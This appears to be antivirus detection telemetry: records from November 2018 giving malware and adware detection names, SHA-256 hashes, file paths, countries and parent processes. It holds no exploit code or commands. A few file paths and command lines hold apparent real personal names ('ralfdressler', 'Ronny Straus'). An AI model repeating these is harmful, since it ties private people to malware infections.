  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:39:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='G:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d66e4c695fbb398526d82de8ce26a920518d52d040050a474680098e01b6d8f2', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1744896, timestamp='2018-11-01T01:51:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:44:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093446-8f5393c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093446-8F5393C9', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\Desktop\\Nova pasta (2)\\Nova pasta\\CraftLandia Minecraft\\data\\CraftLandia Minigames\\data\\.minecraft\\versions\\1.7.2\\1.7.2-natives-1962161577821\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.A.#M1.#R1'), hash='88cc182c3d6bdf55365479869ad97451332c7e22dfbe07770abb6eb6fa02ac05', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:46:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:49:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121233-2946faa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-121233-2946FAA3', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:55:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-skypesetup.exe', filepath='H:\\01_Backup\\100_X31\\Software\\Programme zur Installation\\Downloader-fuer-SkypeSetup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='87acb768c45466e576a0e4ccfbc2404f1282d54faf93b673a4a43e9cb94000e5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\ProgramData\\Abelssoft\\FileFusion\\Program\\FileFusion.exe', parentsize=3190760, timestamp='2018-11-04T12:26:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='axdist.exe', filepath='H:\\ISMAIL 2018.11.4\\Popular software26.4.17\\Corel Draw 9\\Config\\Redist\\Axdist.exe', filesize=832000, name='W32/Chir.B.#M1.#R1'), hash='727ea988d5644f3a28f7531a3312389090ffe67d6d9c021d1cd10a9577a41c0c', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files (x86)\\optimizer pro\\optprostart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002443f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002443f', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:51:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ed4e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ed4e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:20:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T22:50:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023b06', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023b06', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T22:30:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214737-bb8f9d43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_257dccb6\\AVSCAN-20181104-214714-B941A03E\\AVSCAN-20181104-214737-BB8F9D43', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:47:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130859-0d054571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130859-0D054571', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151956-9e660060', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151915-99EE9C1C\\AVSCAN-20181104-151956-9E660060', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:19:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T09:52:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240ea', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240ea', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:43:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9322044\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:14:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00019285', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00019285', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131956-3e9fe323', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131956-3E9FE323', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:19:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Downloads\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:44:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134828-6b9984c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134828-6B9984C0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121815-55807f00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_364e103e\\AVSCAN-20181104-121610-422C33EE\\AVSCAN-20181104-121815-55807F00', filesize=372000, name='TR/Trash.Gen.#M1.#R1'), hash='bcac16c5541da822a60e6eb356604c9894322094bf237a8b609cde8902e25cec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:18:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jerus~12.exe', filepath='C:\\Users\\X\\Desktop\\6000 Virus Collection IrFan_1933 or XyberDexstop\\() --- ()\\DANGEROUS (Fvck1933)\\JERUS~12.EXE', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:35:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151124-2bce84a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151124-2BCE84A5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213006-01db52d3', filepath='E:\\Users\\X\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d26e01a\\AVSCAN-20181104-212932-FD9A8DCD\\AVSCAN-20181104-213006-01DB52D3', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline='30784 RONNY-V3\\\\\\\\Ronny Straus', country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\ut\\totalcmd\\TCMADM64.EXE', parentsize=110160, timestamp='2018-11-04T20:39:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f88e1', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f88e1', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215040-7b084beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215040-7B084BEB', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:49:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:27:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221203-6220e51e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221203-6220E51E', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:12:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215658-1047abf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d850e129\\AVSCAN-20181104-215537-07D40A22\\AVSCAN-20181104-215658-1047ABF1', filesize=192000, name='TR/Autorun.AI.#M1.#R1'), hash='00f732f908ef1308c666f9d87084b90aa6f7cb6d01adb5008acd1034588e6259', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:47:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-pp.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-pp.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='a6af29130b37d8eb0e1b3b0d4a52a72e995de380595d877700aa54d5d593e40d', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3933184, timestamp='2018-11-04T17:37:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8a09a30645885737b1b40007c9da1460bfcebb22fa369cf17f9de8f8efe37345', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T00:03:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='{99993401-6489-8491-e5e7-51678fd36277}-feedingfrenzy.exe', filepath='C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\{99993401-6489-8491-E5E7-51678FD36277}-FeedingFrenzy.exe', filesize=2720000, name='W32/Sality.AG.#M1.#R1'), hash='962f95a868731b7d3e51bbbc9cf16302cb90347236199cb4fdd8921bd21f3bfc', metadata=Row(cmdline='SubmitSamples -Auto', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpCmdRun.exe', parentsize=399304, timestamp='2018-11-04T00:12:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cpu_id.exe', filepath='e:\\asusyedek\\temmuz2017\\sontopluuu\\yeni klasör (2)\\masaustu\\mathcad14\\mathcad\\program files\\mathcad\\mathcad 14\\cpu_id.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad66738b1ae36680beb447e692d641671d2fb2d77976998fe2471d8a0473739b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000968b4', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000968b4', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpyxpne0xm', filepath='/tmp/tmpyxpne0xm', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e21560215e4d92257173dc5660252db542a2f6e9', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e21560215e4d92257173dc5660252db542a2f6e9', filesize=2304000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='057bec4b168ee3790125f366ed6c0fd2457087239aea10c60988f3a304155106', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:46:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhgtiddi.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\mhgTIDDi.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bulk+image+downloader+532+crack.exe', filepath='E:\\BULK+IMAGE+DOWNLOADER+532+CRACK.EXE', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='8311771003a82e687eb45681c7943c563e65b03c7901745b595b9780823022d1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T08:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-002501-1e6cffd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82577724\\AVSCAN-20181103-002312-11B56C44\\AVSCAN-20181103-002501-1E6CFFD5', filesize=1408000, name='ADWARE/MultiPlug.Gen7.#M1.#R1'), hash='c9b92b3a543014011b81827d763915eb286bd37a742c81ab879123ff77428b7d', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T18:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='H:\\HBCD\\Programs\\NTBOOTAUTOFIX.EXE', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:40Z'), dt=datetime.date(2018, 11, 2)),
